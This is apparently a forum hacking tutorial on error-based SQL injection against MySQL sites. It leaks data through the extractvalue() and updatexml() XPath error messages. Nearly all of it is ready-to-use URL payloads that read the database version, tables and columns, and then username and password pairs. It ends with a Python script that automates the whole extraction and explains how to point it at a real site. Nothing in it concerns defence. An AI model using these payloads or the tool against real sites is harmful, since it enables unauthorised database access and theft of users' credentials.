Xpath injection
Despite the name, this is error-based SQL injection against MySQL: the XML functions extractvalue() and updatexml() validate their XPath argument and echo it back inside the error message, so any SQL expression you put into that argument is leaked through the error text on the page.
Application (when to use it):
1. When order by does not give you the column count, for example order by 99999-- returns the page unchanged instead of an error.
2. When union select with the right number of columns produces a different error instead of the expected page.
3. When union works and the column count is correct, but no column is shown on the page, so there is nowhere to put your query.
4. .....
--------------
How to use the xpath method
First try the usual bypasses you already know: a minus sign in front of the number, checking the page source for the output, changing the case of keywords, and so on.
If that does not solve the problem, use this method.
Xpath method tutorial:
Get the version:
Code:
…..?sa=12+and+extractvalue(rand(),concat(0x7e,version()))--
0x7e is the hex for the ~ symbol. It goes in front of the value so that the XPath is invalid from its first character and the whole value is printed back in the XPATH syntax error.
version() returns the version of the site's MySQL server.
Note: the error message shows at most 32 characters, including the ~. For longer values wrap the expression in substr(...,1,31), then substr(...,32,31), and so on, and join the pieces. Also, MySQL only treats -- as a comment when whitespace follows it, so -- followed by a space (typed as --+ or -- - in the URL) is safer than a bare --.
In the next tutorial, I will show how to pull out the tables.
-------------
As promised, this part shows how to pull out tables with the Xpath method.
Obtaining tables:
Code:
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+limit+0,1)))--
select: display a value,
table_name: the table's name,
from information_schema.tables: the system view that lists every table on the server,
limit 0,1: return one table at a time; the first number is the offset (0 is the first table, 1 the second, and so on), the second number is how many rows to return.
To go through the tables one by one, increase the first number of the limit (remember that the first table is 0, not 1).
To restrict the list to the site's own database, so that the default system tables are not shown:
Code:
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))--
As above, increase the limit offset one by one.
In the next tutorial, I will show how to pull out columns.
Pull out columns:
Code:
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex of the important table}+limit+0,1)))--
In place of {hex of the important table}, write the name of the table you care about as a hex literal with the 0x prefix (for example, users becomes 0x7573657273). table_name is compared as a string here, and the hex form needs no quotes, so it passes filters that strip quotes.
To pull out all the columns, increase the limit offset one by one.
-----------------
Example:
First column:
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex of the important table}+limit+0,1)))--
Second column:
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex of the important table}+limit+1,1)))--
Third column:
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex of the important table}+limit+2,1)))--
And so on.
Extract username and password:
Code:
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+concat(username,0x3a,password)+from+{important table}+limit+0,1)))--
In the {important table} spot, write the name of your table plainly, without hex: after from it is a table identifier, not a string, so the 0x form does not work there. username and password stand for the column names you pulled out in the previous step, and 0x3a is a colon that separates the two values in the output.
-------------
Note: If the site filters extractvalue, or you get an error from it, you can use its alternative:
updatexml
To check that updatexml reaches the database unfiltered, first send this:
Code:
Site.com/news.php?ID=23+and+updatexml()--
If you get an error like:
Incorrect parameter count in the call to native function 'updatexml'
then updatexml is not filtered: the function name reached MySQL, which complained about the missing arguments. The same response also confirms that the page displays database errors, which this whole method depends on.
The first command, to get the version:
Code:
…..?ID=23+and+updatexml(null,concat(0x3a,version()),null)--
Here 0x3a (a colon) plays the same role in front of the value that 0x7e did with extractvalue.
Extract the tables, restricted to the site's database:
Code:
…..?ID=23+and+updatexml(null,concat(0x3a,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)),null)--
Increase the first number of the limit to show the next tables (zero is the first table).
Pull out columns:
Code:
…..?ID=23+and+updatexml(null,concat(0x3a,(select+column_name+from+information_schema.columns+where+table_name={hex of the important table}+limit+0,1)),null)--
Replace {hex of the important table} with your table's name as a 0x hex literal, and increase the limit offset one by one to see each column.
Extract password and username:
Code:
…..?ID=23+and+updatexml(null,concat(0x3a,(select+concat(username,0x3a,password)+from+{table name}+limit+0,1)),null)--
Here too the table name after from is written plainly, not hex-encoded, and username and password are the column names found in the previous step.
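The extractvalue and updatexml chains above (version, tables, columns, then a row) are the same loop with the SQL expression swapped in, and the one thing the tutorial does not show is what to do with values longer than the 32 characters the XPATH error can display. The following script is an added example, not the tutorial author's code: it builds the same payloads for either function, parses the leaked text out of the error message, and walks long values with substr(). HTTP is reduced to a send(payload) -> html callable, and FakeTarget, SAMPLE_ANSWERS, the parameter prefix 12 and the table/column names are all constructed so it runs offline.

```python
"""Automating the error-based extraction chain from the tutorial (added example,
not the tutorial author's code). Builds the extractvalue()/updatexml() payloads,
parses the leaked value out of the "XPATH syntax error" message, and pages through
values longer than the 32 characters that error can show, using substr()."""
import html
import re
from typing import Callable

MARKER = "~"    # 0x7e in the tutorial; any character that is invalid XPath works
WINDOW = 31     # the error shows at most 32 characters, and one is the marker
ERR_RE = re.compile(r"XPATH syntax error: '(.*?)'")


def hexlit(s: str) -> str:
    """String as a MySQL hex literal (the tutorial's 'table name as hex, with 0x')."""
    return "0x" + s.encode().hex()


def build_payload(expr: str, func: str = "extractvalue", prefix: str = "12") -> str:
    """Value for the injectable parameter that leaks the SQL expression `expr`."""
    leak = f"concat({hexlit(MARKER)},{expr})"
    call = {"extractvalue": f"extractvalue(rand(),{leak})",
            "updatexml": f"updatexml(null,{leak},null)"}[func]
    # "-- -": MySQL only treats -- as a comment when whitespace follows it
    return f"{prefix} and {call}-- -"


def table_expr(offset: int) -> str:
    return f"(select table_name from information_schema.tables where table_schema=database() limit {offset},1)"


def column_expr(table: str, offset: int) -> str:
    # table_name is compared as a string, so the hex literal avoids quotes
    return f"(select column_name from information_schema.columns where table_name={hexlit(table)} limit {offset},1)"


def row_expr(table: str, columns: list, offset: int) -> str:
    # after FROM the table name is an identifier: written plainly, never hexed
    return f"(select concat({',0x3a,'.join(columns)}) from {table} limit {offset},1)"


def leak_from_response(body: str):
    """Leaked text from the page, or None when no XPath error appeared."""
    m = ERR_RE.search(html.unescape(body))  # PHP pages often HTML-escape the quotes
    if not m:
        return None
    shown = m.group(1)
    return shown[len(MARKER):] if shown.startswith(MARKER) else shown


def dump(send: Callable[[str], str], expr: str, func: str = "extractvalue") -> str:
    """Read the whole value of `expr`, WINDOW characters per request."""
    parts, pos = [], 1
    while True:
        frag = leak_from_response(send(build_payload(f"substr({expr},{pos},{WINDOW})", func)))
        if not frag:              # NULL (nothing at this offset) raises no error at all
            break
        parts.append(frag)
        if len(frag) < WINDOW:    # a short window means the value ended
            break
        pos += WINDOW
    return "".join(parts)


def enumerate_values(send, expr_at: Callable[[int], str], func: str = "extractvalue") -> list:
    """Walk `limit N,1` upward until the subquery returns nothing (tables, columns, rows)."""
    found = []
    for offset in range(1000):
        value = dump(send, expr_at(offset), func)
        if not value:
            break
        found.append(value)
    return found


class FakeTarget:
    """Constructed stand-in for the vulnerable page (not a real server): answers the
    payloads the way MySQL would, including the 32-character truncation."""
    SUBSTR_RE = re.compile(r"substr\((.*),(\d+),(\d+)\)")

    def __init__(self, answers: dict):
        self.answers = answers    # SQL expression -> value the real database holds

    def send(self, payload: str) -> str:
        m = self.SUBSTR_RE.search(payload)
        value = self.answers.get(m.group(1)) if m else None
        if value is None:
            return "<html><body>normal page</body></html>"
        start, length = int(m.group(2)) - 1, int(m.group(3))
        shown = (MARKER + value[start:start + length])[:32]
        return ("<b>Warning</b>: mysqli_fetch_array(): XPATH syntax error: "
                + html.escape(f"'{shown}'") + " in /var/www/news.php on line 23")


# Constructed sample database for the offline run (names and hash are made up).
SAMPLE_ANSWERS = {
    "version()": "5.7.30-0ubuntu0.18.04.1-log",
    table_expr(0): "news", table_expr(1): "users",
    column_expr("users", 0): "id", column_expr("users", 1): "username", column_expr("users", 2): "password",
    row_expr("users", ["username", "password"], 0):
        "admin:$2y$10$" + "abcdefghijklmnopqrstuvwxyz" * 2 + "0",   # 66 chars, so 3 windows
}


def demo(func: str = "extractvalue") -> dict:
    """Run version, tables, columns and the first row against the fake target."""
    send = FakeTarget(SAMPLE_ANSWERS).send
    columns = enumerate_values(send, lambda i: column_expr("users", i), func)
    return {"version": dump(send, "version()", func),
            "tables": enumerate_values(send, table_expr, func),
            "columns": columns,
            "row": dump(send, row_expr("users", columns[1:], 0), func)}
```

Against a real page, replace FakeTarget.send with a function that puts the payload into the vulnerable parameter (for example with urllib.parse.urlencode) and returns the response body; the stop conditions stay the same, because a subquery that returns NULL makes concat() NULL and then no XPath error is raised at all, which is what ends the limit walk.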